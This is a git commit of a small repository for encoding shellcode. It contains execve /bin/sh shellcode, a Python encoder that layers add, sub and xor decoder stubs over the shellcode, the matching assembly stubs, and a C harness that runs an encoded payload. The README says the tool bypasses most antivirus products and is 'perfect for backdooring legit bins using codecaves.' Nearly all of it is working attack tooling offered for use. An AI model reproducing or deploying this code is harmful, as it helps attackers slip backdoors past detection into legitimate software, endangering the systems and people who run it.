Browse Source

first commit

master
sp0re 1 year ago
commit
1c7cca736c
11 changed files with 147 additions and 0 deletions
  1. +7
    -0
      README.md
  2. +17
    -0
      add_decoder.s
  3. +58
    -0
      sc_encode.py
  4. BIN
      sub_decoder
  5. +17
    -0
      sub_decoder.s
  6. BIN
      test_sc
  7. +15
    -0
      test_sc.c
  8. BIN
      write
  9. +16
    -0
      write.s
  10. BIN
      xor_decoder
  11. +17
    -0
      xor_decoder.s

+ 7
- 0
README.md View File

@@ -0,0 +1,7 @@
# Shellcode encode

wip...

Very simple encoding but enough to bypass a mast majority of AVs out there.. Perfect for backdooring legit bins using codecaves for example

You can create your won encoding logic by first creating the decoder in asm, then doing the same logic to apply on the shellcode in python. You can also add multiple layer of encoding for no reason..

+ 17
- 0
add_decoder.s View File

@@ -0,0 +1,17 @@
jmp short three

one:
pop rsi
xor rcx, rcx
mov cl, 20

two:
sub byte [rsi + rcx -1], 1
sub cl, 1
jnz two
jmp short four

three:
call one

four:

+ 58
- 0
sc_encode.py View File

@@ -0,0 +1,58 @@
#!/usr/bin/env python3

import sys
from binascii import hexlify


# execve /bin/sh
SC = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

ADD_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x6c\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
SUB_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x44\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
XOR_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x74\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"


def encode(sc, action, value):
new_sc = []
if action == 'add':
decoder = ADD_DECODER
elif action == 'sub':
decoder = SUB_DECODER
elif action == 'xor':
decoder = XOR_DECODER

for byte in sc:
if action == 'add':
new_sc += [(byte+value) % 256]
elif action == 'sub':
new_sc += [(byte-value) % 256]
elif action == 'xor':
new_sc += [(byte^value) % 256]

new_sc = bytes(new_sc)
decoder = decoder.replace(b"%SC_LEN%", bytes([len(new_sc)]))
decoder = decoder.replace(b"%VAL%", bytes([value]))
return decoder + new_sc


def main():
rnd = []
for i in range(0, len(sys.argv[1:]), 2):
rnd += [(sys.argv[i+1], int(sys.argv[i+2]))]

print(f"[*] Raw shellcode length: {len(SC)}")

encoded = SC
for i in rnd:
encoded = encode(encoded, i[0], i[1])

if b'\x00' in encoded:
print("[!] Warning: null byte found in encoded shellcode!")

print(f"[*] Final encoded shellcode + decoder length: {len(encoded)}")
print("[+] Shellcode: ")
print( "\\x" + str(b"\\x".join(hexlify(bytes([x])) for x in encoded), 'utf-8') )


if __name__=='__main__':
main()

BIN
sub_decoder View File


+ 17
- 0
sub_decoder.s View File

@@ -0,0 +1,17 @@
jmp short three

one:
pop rsi
xor rcx, rcx
mov cl, 20

two:
add byte [rsi + rcx -1], 1
sub cl, 1
jnz two
jmp short four

three:
call one

four:

BIN
test_sc View File


+ 15
- 0
test_sc.c View File

@@ -0,0 +1,15 @@
#include <stdio.h>
#include <string.h>

// Generated with 'python sc_encode.py add 4 sub 6 xor 7'
char code[] =
"\xeb\x12\x5e\x48\x31\xc9\xb1\x63\x80\x44\x0e\xff\x28\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff\xc3\xea\x36\x20\x09\xa1\x89\x22\x58\x4c\xe6\xd7\xdd\x58\xc1\xd9\x4d\xce\xc3\xdd\xc0\xc1\xd7\xd7\xd7\xc6\xef\x33\x25\x0c\xa4\x8c\x0c\x5d\x41\xe3\xd2\xd9\x5d\xc4\xdc\x48\xcb\xc6\xd8\xc5\xc4\xd2\xd2\xd2\xc2\xeb\x3f\x21\x08\xa0\x88\xf1\x59\x4d\xef\xde\xdb\x59\xc0\xd8\x54\xd7\xc2\xe4\xc1\xc0\xde\xde\xde\x2b\x23\x0a\xb5\x23\x0a\xd1\x23\x9c\x08\x45\x42\x49\x08\x08\x54\x43\x34\x37\x38\x8b\x1c\xe8\xe6";


int main(int argc, char** argv)
{
printf("Shellcode length: %d bytes\n", (int)strlen(code));

(*(void(*)()) code)();
return 0;
}

BIN
write View File


+ 16
- 0
write.s View File

@@ -0,0 +1,16 @@
BITS 64

section .text
global _start

_start:
xor rax, rax
push rax
inc rax
mov rdi, rax
push 0x41414141
mov rsi, rsp
mov rdx, 0x8
syscall
mov rax, 60
syscall

BIN
xor_decoder View File


+ 17
- 0
xor_decoder.s View File

@@ -0,0 +1,17 @@
jmp short three

one:
pop rsi
xor rcx, rcx
mov cl, 20

two:
xor byte [rsi + rcx -1], 1
sub cl, 1
jnz two
jmp short four

three:
call one

four:

Loading…
Cancel
Save